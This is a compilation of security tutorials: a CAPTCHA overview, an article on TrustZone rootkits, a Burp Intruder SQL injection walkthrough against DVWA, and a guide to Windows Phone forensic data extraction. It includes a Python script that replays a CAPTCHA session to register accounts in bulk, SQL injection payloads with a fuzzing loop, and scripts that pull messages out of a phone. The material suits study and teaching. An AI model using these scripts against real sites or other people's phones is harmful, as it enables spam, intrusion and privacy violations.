A CAPTCHA must be accessible and should not be based solely on reading text or other visual-perception tasks. If a CAPTCHA prevents visually impaired users from accessing the protected resource, it may make a site incompatible with disability access rules in most countries. Any implementation of a CAPTCHA should allow blind users to get around the barrier, for example, by permitting users to opt for an audio or sound CAPTCHA.

Image Security

CAPTCHA images of text should be distorted randomly before being presented to the user. Many implementations of CAPTCHAs use undistorted text, or text with only minor distortions. These implementations are vulnerable to simple automated attacks.

Script Security

A high level of script security should be enabled, and building secure CAPTCHA code is not easy. In addition to making the images unreadable by computers, the system should ensure that there are no easy ways around it at the script level. For one, the system must not pass the answer to the CAPTCHA in plain text as part of the web form. Also, a solution to the same CAPTCHA should not be accepted multiple times.

Scalability

A CAPTCHA should be scalable in the sense that, even after widespread adoption by a large number of websites, it should still provide security. For some CAPTCHAs, if they were adopted by a large number of websites, their security would become flawed and they would be vulnerable to bot attacks. One example is a CAPTCHA puzzle asking text-based questions, such as the mathematical question "what is 2+2?". Since a parser could easily be written that would allow bots to bypass this test, such "CAPTCHAs" rely on the fact that few sites use them, and thus that a bot author has no incentive to program their bot to solve that challenge. True CAPTCHAs should be secure even after a significant number of websites adopt them.

3. Types of CAPTCHA

Text-Based CAPTCHAs

These are simple to implement and are based on questions that can only be solved by a human being. Such questions can be like any of the following:

Which word from the list: "claw, generous, verbosity" has "v" as a first letter?
What is the color in the list: coat, school, apple, pink or tongue?
If yesterday was a Sunday, what is today?

Text-based CAPTCHAs also involve text distortion and are classified as follows:

reCAPTCHA

reCAPTCHA is a free CAPTCHA service that helps to digitize books, newspapers and old-time radio shows. reCAPTCHA improves the process of digitizing books by sending words that cannot be read by computers to the Web in the form of CAPTCHAs for humans to decipher.
More specifically, each word that cannot be read correctly by OCR is placed on an image and used as a CAPTCHA. This is possible because most OCR programs alert you when a word cannot be read correctly. Each new word that cannot be read correctly by OCR is given to a user in conjunction with another word for which the answer is already known. The user is then asked to read both words. If they solve the one for which the answer is known, the system assumes their answer is correct for the new one. The system then gives the new image to a number of other people to determine, with higher confidence, whether the original answer was correct. Answers to reCAPTCHA challenges are used to digitize textual documents. It's not easy, but through a sophisticated combination of multiple OCR programs, probabilistic language models, and most importantly the answers from millions of humans on the Internet, reCAPTCHA is able to achieve over 99.5% transcription accuracy at the word level.

GIMPY

Gimpy works by choosing ten words randomly from a dictionary and displaying them in a distorted and overlapped manner. It arranges the words in pairs, and each word pair overlaps one another. The user then has to type three correct words to pass the CAPTCHA test. It is one of the more difficult variants of a word-based CAPTCHA.

Ez-Gimpy

This type of CAPTCHA works by picking a word from a dictionary and rendering it with distortion on a cluttered background. Ez-Gimpy can be described as a simplified variant of the Gimpy CAPTCHA; the difference is that it picks only a single word from the dictionary.

Baffle text

Unlike the Gimpy variants, Baffle text produces pronounceable character strings that are not in the English dictionary. This method was developed by Henry Baird at the University of California. It applies random masking to degrade images of these non-dictionary character strings.

MSN CAPTCHA

The proprietary CAPTCHA of Microsoft contains eight characters, using a combination of upper-case characters and digits.

Graphic-based CAPTCHAs

This type of CAPTCHA produces challenges built from pictures or objects that have some similarity, which the user has to reason about.

Bongo CAPTCHA

A Bongo CAPTCHA uses visual patterns and prompts users to solve a puzzle. Normally this type of CAPTCHA provides two sets of images, and the user is given another image which has to be matched against one of the two sets.

PIX

PIX contains a large database of labeled images of various concrete objects, including horses, flowers, houses, etc. The program randomly chooses one of the objects and selects four random images of it. These are presented to the user, who is asked what the pictures are of.

ESP-PIX

This is a variant of the PIX CAPTCHA, where a picture is paired with the word that best describes it. The important factor is that ESP-PIX is a CAPTCHA script that, instead of asking you to type letters, requires that you look at a set of pictures and then select the word that best describes all the images.

3D CAPTCHA

These are CAPTCHAs with three-dimensional pictures, which makes them more difficult for a computer to recognize while remaining easy for a human. The advantage is that any image can be transformed into a CAPTCHA image, and it will be easier for humans to solve a 3D CAPTCHA than the text-based ones. But the risk with 3D CAPTCHAs is that a bot can use an image analysis tool to solve them.
Image Orientation CAPTCHA

This type of CAPTCHA was developed by Google. A large database of images is filtered with automatic image-orientation detectors, keeping only images that can be easily reoriented by users. A social feedback mechanism is then used by Google to verify whether the remaining images have a human-recognizable upright orientation. The advantage of this type of CAPTCHA is that it is language independent and does not require text entry.

Microsoft ASIRRA or Image recognition CAPTCHA

Microsoft ASIRRA (Animal Species Image Recognition for Restricting Access), an image recognition CAPTCHA, contains a database of labelled images provided by petfinder.com. In this, users have to separate the images of cats and dogs in order to pass the test. At first the CAPTCHA was thought of as a success that couldn't be breached by a computer, but it was later proved that it is not difficult for a computer to distinguish a cat from a dog.

Geometric CAPTCHA

This type of CAPTCHA can be seen as a variant of the math CAPTCHA, which gives challenging objectives to humans as well as computers. This CAPTCHA is also breakable by providing random answers and is not secure.

Audio-based CAPTCHAs

The CAPTCHA picks a word, letters or a combination of them, transforms it into a downloadable sound clip and inserts some type of noise as distortion. This distorted sound clip is presented to users, who are asked to enter its contents after hearing it. An audio-based CAPTCHA utilizes the human ability to recognize sound even when distortion is added. This type of CAPTCHA is mainly intended for vision-impaired people; it was proposed by Carnegie Mellon University and is now owned by Google. Sound-based CAPTCHAs have been deployed on Google, Facebook, Yahoo and so on. An audio CAPTCHA is usually located as part of the same interface as the text CAPTCHA, and is given as an alternative for users with poor vision. The user is normally asked to click on the sound icon, upon which they will hear spoken words that sound rather distorted, or which are placed on top of a noisy background. The disadvantage of audio CAPTCHAs is that the background noise sometimes overwhelms the main message. An example is the Google Audio CAPTCHA.

Video-based CAPTCHAs

This type of CAPTCHA uses video or animation techniques; the user is required to watch the clip and give input. One of the top providers of video CAPTCHAs is NuCaptcha, which provides a CAPTCHA implementation using animation techniques in order to make it harder for spam bots to decipher the characters. Its creators claim that NuCaptcha has the highest usability and security levels of any CAPTCHA on the market. NuCaptcha uses patent-pending, next-generation animated CAPTCHA technology, and testing has shown that animated CAPTCHA puzzles are easier for humans to recognize and solve than static, scrambled CAPTCHA images.

4. Bypassing a CAPTCHA

Bypassing a CAPTCHA is challenging, because it is not just about listing what it says. The core task is to teach a computer how to process information in a way similar to humans. Breaking CAPTCHAs is not about making computers smarter, but about reducing the complexity of the problem posed by the CAPTCHA.
For example: an online form is protected using a CAPTCHA that displays English words; the application warps the font slightly, stretching and bending the letters in unpredictable ways. In addition, the CAPTCHA includes a randomly generated background behind the word. A programmer wishing to break this CAPTCHA could approach the problem in phases. First, an algorithm is written whose initial step might be to convert the image to grayscale – the application removes all the color from the image, stripping away one of the levels of obfuscation the CAPTCHA employs. Then the algorithm tells the computer to detect patterns in the black-and-white image and compare each pattern to normal letters. If only a few letters are matched, the program might cross-reference those letters with a dictionary of English words and plug likely candidates into the submit field. This is one of the more effective ways of bypassing a CAPTCHA. It doesn't guarantee success every time, but it can work often enough to be worthwhile to spammers.

4.1 Breaking CAPTCHAs using Session ID

CAPTCHAs normally don't delete the session even if the correct answer is entered. This session can be reused to bypass the CAPTCHA by automating requests to it. This is done by storing the session ID of the CAPTCHA and the CAPTCHA plain text. The process can be automated by resending the session ID and CAPTCHA plain text multiple times while changing the user data. This automated process can handle many requests in a stretch until the session expires; in case of expiration, manual steps can be used to reconnect with a new session ID and CAPTCHA text. CAPTCHA-breaking software also commonly uses image recognition routines to decode CAPTCHA images, which can be combined with this to make attacking CAPTCHA images easy.
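As an illustration of the session-reuse weakness just described, consider this hedged Python sketch (everything here – the URL, field names and cookie name – is hypothetical; it simply replays one solved CAPTCHA against a server that forgets to invalidate the session):

import requests  # pip install requests

# Hypothetical target: a registration form whose CAPTCHA session is never
# invalidated after a correct answer.
URL = "http://target.example/register.php"
SESSION_ID = "captured-session-id"   # recorded once from a browser
CAPTCHA_ANSWER = "XK4PQ"             # solved manually a single time

for i in range(100):
    data = {"username": "bot%d" % i, "captcha": CAPTCHA_ANSWER}
    r = requests.post(URL, data=data, cookies={"PHPSESSID": SESSION_ID})
    if "expired" in r.text.lower():
        print("session died after %d requests; solve a fresh CAPTCHA" % i)
        break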
4.2 Breaking a visual CAPTCHA

Gimpy is just an application of a general framework that has been used to compare images of everyday objects and even to find and track people in video sequences. Breaking it proceeds in three steps.

Locate possible letters at various locations: The first step is to hypothesize a set of candidate letters in the image. This is done using shape-matching techniques: the method essentially looks at a bunch of points in the image at random and compares these points, point by point, to each of the 26 letters. The comparison is done in a way that is very robust to background clutter and to deformation of the letters. The process usually results in 3-5 candidate letters per actual letter in the image. In the example shown in Fig 5.1, the "p" of profit matches well to both an "o" and a "p", the border between the "p" and the "r" looks a bit like a "u", and so forth. At this stage we keep many candidates, to be sure we don't miss anything for later steps.

Construct graph of consistent letters: Next, we analyze pairs of letters to see whether or not they are "consistent", that is, whether they can be used consecutively to form a word.

Look for plausible words in the graph: The graph yields multiple words, and this list has to be shortlisted to choose the appropriate one. For this we select the real words and score them on how well their individual letters match the image, and thus the CAPTCHA can be bypassed.

4.3 Social Engineering attacks on CAPTCHA

Trojans combined with social engineering activity can be used to crack CAPTCHAs. A Trojan named TROJ_CAPTCHAR can act as a game in which, at each stage, the user is asked to solve a CAPTCHA. The result is relayed to a remote server, where a malicious user is provided with the answer. Thus the CAPTCHAs of legitimate sites can be solved by unwitting humans and the solutions used to bypass the CAPTCHA in an automated manner.

5. Applications of CAPTCHAs

CAPTCHAs are used in various applications to identify human users and to restrict access by bots. Some of them are:

Online Polls

Online polls have been affected by bots that vote automatically to inflate the count for their side. They might create a large number of votes which would falsely determine the poll winner. CAPTCHAs can be used on websites that run polls to protect them from being accessed by bots, and hence increase the reliability of the polls.

Blogs and Forums

Spam comments on blogs and forums have been one of the major problems that bloggers and forum administrators face. Almost all bloggers are familiar with bots that submit a large number of posts with some URL embedded in order to improve its search ranking. CAPTCHAs can be used to prevent a bot from commenting on a large number of posts on a blog, though this doesn't stop a spammer from posting manually in the comment space provided.

Email account registration

Email service providers like Google and Yahoo have been flooded with accounts created by bots. In order to stop these spam accounts, several email service providers and web registration services use CAPTCHAs on their account registration pages. This ensures that no bots intervene in the form-filling activity.

Search engine bots

Web pages can be kept unindexed to prevent search engines from finding them easily. An HTML tag can be used to ask search engine bots not to read web pages; however, this tag doesn't guarantee that bots won't index them. In order to truly guarantee that bots won't enter a website, CAPTCHAs can be used to restrict access to human visitors only.

Spam Email

All over the Internet there are email addresses embedded in websites. Bots are used by spammers to collect those email addresses and to send junk and spam emails. This can be eliminated by using a CAPTCHA to gate retrieval of the full email address.

Dictionary Attacks

CAPTCHAs can also be used to prevent dictionary attacks on password systems. They prevent a brute-force attack from iterating through the entire space of passwords: a CAPTCHA can be popped up, requiring the user to solve it after a certain number of unsuccessful logins.

reCAPTCHA (Digitizing Books)

reCAPTCHA is a free CAPTCHA service that helps to digitize books, newspapers and old-time radio shows.
reCAPTCHA improves the process of digitizing books by sending words that cannot be read by computers to the Web in the form of CAPTCHAs for humans to decipher. More specifically, each word that cannot be read correctly by OCR is placed on an image and used as a CAPTCHA.

6. Conclusion

CAPTCHAs can certainly be used to prevent automated collection of data from, or automated access to, web servers, but there are a lot of issues with CAPTCHAs in cases where the text or image distortion becomes difficult for humans to solve as well. There are several issues with text-based CAPTCHAs like Gimpy. Most commonly, the issue arises from confusion between letters and character combinations, like 'm' confused with 'rn', and 'd' with 'cl', etc. A language problem also arises when a person who is unfamiliar with English, or some other language, is presented with a CAPTCHA in that language. When longer CAPTCHAs are used, it becomes difficult for users to solve them without any mistakes. Also, the CAPTCHA should be presented in a way that doesn't cause confusion between font color and background color. In the case of audio CAPTCHAs, when heavy distortion is added as background noise, it becomes difficult for users to separate the original sound from the noise. Also, the contents of audio CAPTCHAs are based on a specific language, and if a user is unfamiliar with the pronunciation and style of that content, it becomes hard to solve. Audio CAPTCHAs can also cause compatibility issues and may require the use of JavaScript on that particular webpage.

7. References

How CAPTCHA Works - HowStuffWorks
http://dspace.cusat.ac.in/jspui/bitstream/123456789/2228/1/CAPTCHA.pdf
Text-based CAPTCHA Strengths and Weaknesses
Accessible Text CAPTCHA Logic Questions
http://www.ijens.org/Vol_11_I_05/117005-8383-IJVIPNS-IJENS.pdf

Source
-
While the security of mobile operating systems is one of the most researched topics today, exploiting and rootkitting ARM-based devices gets more and more interesting. This article will focus on the exploitation of TEEs (Trusted Execution Environments) running in ARM TrustZone to hide a TrustZone-based rootkit.

First let's take a look at what we are protecting on our modern mobile phones:

We protect our communication – doesn't matter if it's calls or text messages
Our data – lots of people have documents on their phones (from their businesses, presentations, contracts and so on)
Our credentials – like email passwords, different types of keys, etc.
Our payments – like online wallets (Google Wallet, Yahoo Wallet), PayPal, and other bank information.

Let's see which famous rootkits succeeded in collecting information from mobiles and remained hidden for a long time.

CarrierIQ

Used for logging user keystrokes, recording telephone calls, storing text messages, tracking location and more, and on top of that it was difficult or impossible to disable. The software is meant to improve the customer experience; however, in nearly every case, CarrierIQ users don't know about the software's existence, as it runs hidden in the background and doesn't require authorized consent to function. This rootkit was discovered by Trevor Eckhart, and he demonstrated in a video that CarrierIQ is tracking our data. At the end, his questions are:

- Why do key presses submit UI01 & unique key codes?
- Why does SMSNotify get called and show to be dispatching text messages to CarrierIQ?
- Why is my browser data being read, especially HTTPS on my WiFi?
- Why is this not opt-in, and why is it so hard to FULLY remove?

What can you do? Trevor Eckhart created a tool called Logging TestApp, which turned into a full security suite and can be used to verify what logging is being done on your phone and where data is going. It will assist you in manually removing parts you do not know are running. Alternatively, the pro version of Logging TestApp – which automates everything – is available in the Android Marketplace for $1; it has also proven successful in most situations.

FinFisher – FinSpy

FinSpy is a remote monitoring solution that enables governments, agencies and companies to face the current challenges of monitoring mobiles. It has been proven successful in operations around the world for many years, and valuable intelligence has been gathered about target individuals and organizations. It's spread by links, email attachments and infected websites. FinFisher was made by a company called Gamma International, and it is marketed as a powerful tool for secretly accessing the computers of suspected criminals and terrorists. Once it has infected your computer, FinFisher is not detected by anti-virus or anti-spyware software. Some of FinFisher's capabilities are the following: it steals passwords from your computer, allowing access to your e-mail accounts; wiretaps your Skype calls; turns on your computer's camera and microphone to record conversations and video from the room that you are in.
A quick description of the FinSpy tool, collected by Privacy International among others and posted on Wikileaks, makes a series of claims about functionality:

Bypassing of 40 regularly tested Antivirus Systems
Covert Communication with Headquarters
Full Skype Monitoring (Calls, Chats, File Transfers, Video, Contact List)
Recording of common communication like Email, Chats and Voice-over-IP
Live Surveillance through Webcam and Microphone
Country Tracing of Target
Silent Extracting of Files from Hard-Disk
Process-based Key-logger for faster analysis
Live Remote Forensics on Target System
Advanced Filters to record only important information
Supports most common Operating Systems (Windows, Mac OSX and Linux)

Be wary of opening unsolicited attachments received via email, Skype or any other communications mechanism. If you believe that you are being targeted, it pays to be especially cautious when downloading files over the Internet, even from links that are purportedly sent by friends. You can find some very well explained articles regarding FinFisher on citizenlab.org (find the links in the resources section).

Where are rootkits hidden?

On mobile phones there are just two places where rootkits can hide with success: the CPU and the baseband. On most platforms, both the CPU and the baseband have full memory access, so if you can own the baseband you actually own the device. Even so, next to the CPU and baseband we can find a small hardware addition by ARM called TrustZone, and I will focus on this for the rest of the article.

The ARM processor is a 32-bit RISC processor, meaning it is built using the reduced instruction set computer (RISC) instruction set architecture (ISA). ARM processors are microprocessors and are used in as many as 98% of mobile phones sold each year. They are also used in personal digital assistants (PDAs), digital media and music players, hand-held gaming systems, calculators, and even computer hard drives.

TrustZone is basically a security extension of your ARM processor that allows it to switch into a "secure mode" which hopefully will execute only trusted code. Here are other TrustZone functions:

Secure access to screen, keyboard and other peripherals
Tries to protect against malware, Trojans and rootkits
So-called TEEs (Trusted Execution Environments) run on it
Splits the CPU into two worlds, secure and normal; communication between both worlds is made via shared memory mappings.

A Trusted Execution Environment is a small operating system running in TrustZone that provides services to the real operating system. To better understand TEEs we can look at Netflix as an example:

Requires a device certification
For SD, the device just needs to be fast enough to play video
For HD, the labels require 'end-to-end' DRM, so that the video stream can't be grabbed at any time
Video decoding runs in TrustZone with direct access to the screen, so there is no way to record it from Android.

A diagram by Thomas Roth (not reproduced here) explains perfectly how the whole system works, connecting the normal world and the secure world together. On a world switch, the SMC (Secure Monitor Call) handler sorts the information received from the normal or secure world, stores the registers of the current world, loads the new world's registers, toggles the NS bit and resumes execution in the other world. As for memory allocation (also diagrammed by Thomas Roth): the normal world can only access its own memory and the shared segment, while the secure world can access everything.
The boot process will start the trusted segment first, then the normal segment, as below (diagram by Thomas Roth, not reproduced here). Basically, the vendor installs a small operating system in a protected part of the CPU, and this OS can do anything; third-party apps are installed on it as well. Knowing these facts, let's see what we need to build a rootkit in TrustZone.

OMAP HS development board (Open Multimedia Applications Platform)

Connectivity and system integration
Supports best-in-class video, graphics and multimedia performance
Security – OMAP processors support secure boot and run time
Vision analytics – distributed vision processing (DVP) framework, including a programmable DSP
OMAP processors provide hardware and software support for virtualization and cloud computing
Packaging – TI offers OMAP processors in a variety of package options
System performance – supports a range of applications and demands
Quality & reliability – rigorous quality assurance practices and a zero-DPPM strategy to continuously improve its products.

QEMU – Quick EMUlator, a hosted virtual machine monitor

It emulates central processing units through dynamic binary translation and provides a set of device models, enabling it to run a variety of unmodified guest operating systems. It also provides an accelerated mode supporting a mixture of binary translation (for kernel code) and native execution (for user code), in the same fashion VMware Workstation and VirtualBox do. QEMU can also be used purely for CPU emulation for user-level processes, allowing applications compiled for one architecture to be run on another.

TEE (Trusted Execution Environment)

Is used to protect the secure kernel and peripherals from code running in the primary operating system
Supports ARM11
Allows multiple operating systems such as Android, Linux, BSD and other "normal world" OS's
Minimizes memory and system overhead

Note: a tutorial about how to create a small virus for Android can be found in my references links.

Supposing you have already created your rootkit and have it integrated inside TrustZone, there are a few things to keep in mind:

Have a different execution environment, separated from the normal OS
Be sure you cover your traces in order to keep access for a long time
Get control over the CPU regularly in order to access user data and manipulate memory.

How to infect other phones?

- using infected apps
- via updates
- baseband attack

How to avoid infection of your phone?

Latency
Be paranoid
Triple-check your apps' sources and be sure you're installing apps from trusted vendors.

Trevor Eckhart – Xda-developers – Logging TestApp
FinFisher – Wikileaks
FinFisher spykit exposed by citizenlab.org
Bootloader Project – wikipedia page
Generic emulator – QEMU
Open Virtualization – TEE
Create a virus for android
HIP13 –

Source
-
1. Introduction

This article introduces Burp Suite Intruder and shows how it can be used for SQL injection fuzzing.

2. Burp Suite Intruder

It is a part of Burp Suite, which is an integrated platform for website security testing [1]. Burp Suite Intruder is helpful when fuzzing for vulnerabilities in web applications. Let's assume that a penetration tester wants to find SQL injection vulnerabilities. First he needs to intercept the request with Burp Suite Proxy. Then the request is sent to Burp Suite Intruder. After that, the penetration tester needs to define the parameters that will be tested for SQL injection. The next step is defining the payloads and attack type (described later in the article). Then Burp Suite Intruder is launched. When fuzzing is finished, the penetration tester is expected to analyze the output to identify potential vulnerabilities.

3. Target

DVWA (Damn Vulnerable Web Application) is a web application that is intentionally vulnerable [2]. One can use it to play with web application security stuff. Let's attack the page in DVWA that is vulnerable to SQL injection. The user is asked to enter a User ID; then the first name and surname of that user are displayed. DVWA is a part of Metasploitable, which is an intentionally vulnerable Linux-based virtual machine [3]. It can be used to practice penetration testing skills. Please keep in mind that this machine is vulnerable and should not operate in bridged mode.

4. Request Interception, Payload Position, Attack Type

Let's set the security level to low in DVWA (it can be changed under DVWA Security). Then enter a User ID, click Submit and intercept the request with Burp Suite Proxy. The next step is sending the request to Burp Suite Intruder (right-click on the request and choose "Send to Intruder"). Then use the "Add" button in Burp Suite Intruder to choose the parameter that will be fuzzed (it is called a payload position in Burp Suite Intruder). The User ID is sent in the parameter id; that's why it is chosen as the payload position. As can be seen on the screenshot, sniper was chosen as the attack type. In this mode a single set of payloads is used and the payloads are taken one by one, starting from the first position. When all payloads from the set have been used, the same procedure is executed for the next payload position, if present. That's why the number of requests generated is the product of the number of payloads in the set and the number of payload positions.

5. Set of payloads

A penetration tester can create his own list of payloads or use an existing one. Sample payloads can be found, for example, in Kali Linux (a penetration testing distribution [4]) in the /usr/share/wfuzz/wordlist/Injections directory. Let's use SQL.txt from this location to test the parameter id for SQL injection vulnerability. Then choose "Start attack" from the Burp Suite Intruder menu to start fuzzing.

6. Output analysis and exploitation

Let's see how the website responds to different payloads. As we can observe, the length of the response changes. It is 4699 bytes for the baseline request (the one with id equal to 2) and 5005 bytes when x' or 1=1 or 'x'='y is the payload. This might suggest that more data was read from the database. Let's check the response for this payload. As we can see, this payload can be used to extract the first names and surnames of all users from the database.
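The same sniper-style loop can be reproduced outside Burp Suite. Here is a hedged Python sketch that replays every payload from SQL.txt into the id parameter and flags responses whose length deviates from the baseline (the DVWA address and session cookie are placeholders for your own setup):

import requests  # pip install requests

# adjust host, session cookie and security level for your own DVWA instance
BASE = "http://192.168.56.101/dvwa/vulnerabilities/sqli/"
COOKIES = {"PHPSESSID": "put-your-session-id-here", "security": "low"}

baseline = len(requests.get(BASE, params={"id": "2", "Submit": "Submit"},
                            cookies=COOKIES).text)

with open("/usr/share/wfuzz/wordlist/Injections/SQL.txt") as f:
    for payload in (line.strip() for line in f if line.strip()):
        r = requests.get(BASE, params={"id": payload, "Submit": "Submit"},
                         cookies=COOKIES)
        # a response length different from the baseline deserves a manual look
        if abs(len(r.text) - baseline) > 50:
            print(len(r.text), repr(payload))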
7. Summary

Burp Suite Intruder was introduced. It can be helpful when fuzzing for vulnerabilities in web applications. Sample payloads can be found, for example, in Kali Linux in the /usr/share/wfuzz/wordlist/Injections directory. It was also presented how to use Burp Suite Intruder for SQL injection fuzzing.

DOWNLOAD BURPSUITE

Source
-
Abstract

Abbreviated as WP, Windows Phone is a new smartphone operating system developed by Microsoft to succeed the old Windows Mobile. This "new" operating system may potentially become a major mobile platform in the next few years. Windows Phone is still a young proprietary mobile operating system, which means its digital forensics are still not very advanced. This article will take a look at Windows Phone 7 from a forensics perspective; we'll see how to explore SMS, Facebook and Whatsapp messages, and how to extract emails, contacts and pictures. I'll show you the basics and extract as much information as I can from a Windows Phone. All tests were done on an unlocked Nokia Lumia 710 running Windows Phone 7.5, but theoretically this should work with any Windows Phone device.

Introduction

Windows Phone 7 has a security model based on the least privilege principle: each process is given a set of privileges, starting from the lowest access rights given to Windows Phone developer applications up to the standard rights given to native applications. In addition to that, every user application runs in a kind of sandbox – a restricted environment where it isn't allowed to directly access the operating system internals. Data acquisition approaches depend on the kind of smartphone we want to investigate (unlocked or not); in general, we need to install an application that will gain "root" privileges, grab data, then send it back to a connected computer. Technically this may bring some changes to the "original state" of the smartphone, which may result in a small change of evidence. And even if we accept that, a fully unlocked phone is needed to deploy an application on Windows Phone 7 (the methods of bypassing the marketplace procedure for installing an application, like the use of ChevronWP7, don't work anymore). Personally, I always opt for the "dirty" old-school way: always do it by hand!

I'll assume that your Windows Phone is fully unlocked, which is necessary for any investigation, and if so we can proceed by installing either "Windows Mobile Device Center", which is still compatible with Windows Phone, or "Windows Phone Device Manager". Technically these tools are aimed at implementing an efficient business-data synchronization platform, and they can be used to transfer all kinds of data between the connected device and your computer. Both Windows Mobile Device Center and Windows Phone Device Manager need Zune software 4.8 or later to be installed on the computer. In this article I'll use both of these tools.

Windows Phone Device Manager Installation Instructions

Download Windows Phone Device Manager and launch WPDeviceManager.exe
Plug in your phone; it should be detected automatically, if not click Connect in the menu
The first time you connect your phone, Windows Phone Device Manager will automatically install TouchXperience

Requirements

An unlocked/registered Windows Phone 7.5 device
Windows Vista/7/8 32-bit or 64-bit
.NET Framework 4.0
Zune software 4.8 or later
Zune WMDU (optional)
Windows Phone SDK 7.1

All links for downloading the necessary files are in the reference section.

Extracting data

After connecting the phone to your computer and launching Zune, you can run Windows Phone Device Manager, which will automatically install TouchXperience on your Windows Phone. The interfaces of both applications are quite user friendly and need no presentation.
Use "Explore File and Folders" to navigate your Windows Phone files. The data acquisition methodology may differ depending on how we conceive it: you can make a full copy of the connected mobile device and work on that, or just investigate files directly from the phone. As you can probably guess, the Windows Phone file system is arranged the way a normal desktop Windows file system is, just like Windows XP or Windows 7. It's structured with the usual directories reachable from the root. The most important directories to investigate are:

Application Data – contains Internet Explorer, Outlook, Maps and all data related to installed applications on the phone
Applications – contains the isolated storage for every application, in addition to all applications installed by the user
My Documents – contains some configuration files, Microsoft Office files, music and videos
Windows – contains the core files of the operating system.

In this paper I'll talk neither about the registry nor about active tasks.

Extracting SMS

All SMSs are stored in one single file located in the directory "root\Application Data\Microsoft\Outlook\Stores\DeviceStore". The file is "store.vol" and cannot be directly handled (you cannot copy or edit it) since it's always in use by the operating system. The trick is to rename the file, whereupon a copy of the original is instantly made by the operating system. Let's see the content of this file using any text or hexadecimal editor. I always use a hexadecimal editor because it may make you aware of some details that you won't see with a normal text editor. The .vol file seems to be a Windows CE database, and I didn't have enough time to search for a desktop tool to explore it, so we'll do it manually. You can see "Your Viber code is: 6895…" sent from "+44773602030". All SMSs, either sent or received, start with "IPM.SMStext", which makes them easy to find and may allow automating the process of extracting them.

Extracting Emails

Since we're talking about a Windows-based operating system, it seems logical that a Windows Phone uses Outlook as its standard email client. That means that the user can synchronize it with the service they want, such as Yahoo Mail or Gmail. Outlook data is stored in \Application Data\Microsoft\Outlook\Stores\DeviceStore\data and its subdirectories. All these subdirectories are numbered, and each of them contains different data. We'll focus on folders 3, 4 and 19; as for the other folders, I don't know why they're empty! All files contained in these subfolders are ".dat" files, but if you can deal with basic file carving, you can easily find that folders 3 and 19 contain JPEG files, and folder 4 contains HTML files. Let's see how it works: I'll open the first file with a hexadecimal editor and see how it looks. This file contains a valid JPEG file header, so let's just rename the file to something.jpeg and see: this is one of my contacts' photos, and in addition to this, I now know that the phone I'm investigating is "in principle" synchronized with LinkedIn too. So I can go this way as well and push my investigation in depth. Let's now see what folder 4 has to tell us: this file contains HTML tags; renaming it to something.html will give us a working web page that you can easily open.
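Both of the manual steps described above – grepping a copied store.vol for IPM.SMStext records and renaming .dat files according to their magic bytes – lend themselves to a quick script. The following Python sketch is illustrative only (the 400-byte window and the folder layout are guesses; adapt them to what you actually copied off the device):

import os
import re
import shutil

# 1. pull printable fragments around each SMS record out of a copied store.vol
data = open("store.vol", "rb").read()
for m in re.finditer(rb"IPM\.SMStext", data):
    chunk = data[m.start():m.start() + 400]
    # keep only printable bytes so the surrounding text is readable
    print(bytes(b for b in chunk if 32 <= b < 127).decode("ascii"))

# 2. copy .dat files to a new name based on their file signature
SIGNATURES = {b"\xff\xd8\xff": ".jpeg", b"<htm": ".html", b"<!do": ".html"}
for root, _, files in os.walk("DeviceStore/data"):
    for name in files:
        if name.endswith(".dat"):
            path = os.path.join(root, name)
            with open(path, "rb") as f:
                head = f.read(4).lower()
            for sig, ext in SIGNATURES.items():
                if head.startswith(sig):
                    shutil.copy(path, path + ext)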
Extracting Facebook data

Every application on a Windows Phone has its own ID, which identifies it on the marketplace, and as said earlier in this article, the folder "Applications" contains (among other things) all the applications installed on the phone. Each one is installed in a separate directory named after the unique application ID, under the "Applications\Data" directory. The unique Facebook application ID is "82A23635-5BD9-DF11-A844-00237DE2DB9E", and after installation the application creates several folders such as "Cookies", "History" and "IsolatedStore". These folders can contain a lot of useful information, especially "IsolatedStore": DataCache.userID contains almost everything you need to know about the Facebook user with that ID. (In this case 14913XXXX is mine, and the one starting with 5472 is probably a friend who connected to Facebook using my phone.) This folder may contain the user's friends with some details about them such as birthdays, links to their profile pictures, friend requests, incoming and outgoing messages, recent Facebook feeds, the user's notes, and it may even contain the user's last location if the option was enabled… and ALL the data isn't encrypted and can be easily parsed!

An example of some of the latest user feeds: the user (me, Soufiane Tahiri) added a new photo that was shared with all friends except restricted ones, with a direct link to the image. All the user's friends are listed with their FULL names, birthdays and direct links to their respective Facebook profile pictures: Full Name: Abdelouahed XXXXX, birthday March 28, 1987 and the link to his profile picture. All messages sent or received, even spam, are listed (as seen below). The Images folder contains all the images viewed by the user on Facebook using this application; all you need to do is add ".jpeg" as an extension to the file name. The file userID.setting contains the user's Facebook profile name, a link to that profile and a direct link to the user's profile picture. I think I'm done with Facebook – just explore every single file and be sure that you'll get more information than you ask for.

Extracting Whatsapp data

Just like with any other application, all you need to know is the application ID to find where Whatsapp is installed, and the Whatsapp application ID is 218A0EBB-1585-4C7E-A9EC-054CF4569A79. By navigating to Applications\Data\218A0EBB-1585-4C7E-A9EC-054CF4569A79\Data, you can find two folders. PlatformData contains all the pictures captured and sent by the user, and IsolatedStore contains almost everything you want to extract. The IsolatedStore of Whatsapp is arranged like this: the Cphotos folder contains all current contact photos; all you have to do is add ".jpeg" to their respective names. The profilePictures folder contains all previous photos used by all your contacts, a kind of profile picture history; again, all you have to do is add ".jpeg". The Shared folder contains three subdirectories, but the most interesting one is "Transfers": here you can find every single file sent or received via Whatsapp. Even files you've deleted are still there. (I was quite surprised when I discovered that.) Then two interesting files show up, "contacts.db" and "messages.db". Obviously these are SQLite databases: they can easily be explored using any SQLite browser. What's interesting about these files is that you can see every contact's phone number, name and every single detail. Here's the schema of the contacts.db file and some of its content. You can also find all conversations held via Whatsapp, stored in the clear in the "messages.db" file. This folder can be really interesting for an investigation. Maybe I'll write an article only about Whatsapp on Windows Phone, but to limit the size of this article I'll not go further.
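Outside of a GUI SQLite browser, the two databases can be inspected with a few lines of Python. The sketch below deliberately enumerates the schema from sqlite_master instead of assuming table or column names, since the Whatsapp schema may differ between versions:

import sqlite3

# messages.db (or contacts.db) copied out of the Whatsapp IsolatedStore folder
con = sqlite3.connect("messages.db")
cur = con.cursor()

# print the schema of every table rather than guessing column names
cur.execute("SELECT name, sql FROM sqlite_master WHERE type = 'table'")
tables = cur.fetchall()
for name, sql in tables:
    print(sql)

# then dump a few rows from each table for a first look
for name, _ in tables:
    print("---", name)
    for row in cur.execute("SELECT * FROM %s LIMIT 5" % name):
        print(row)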
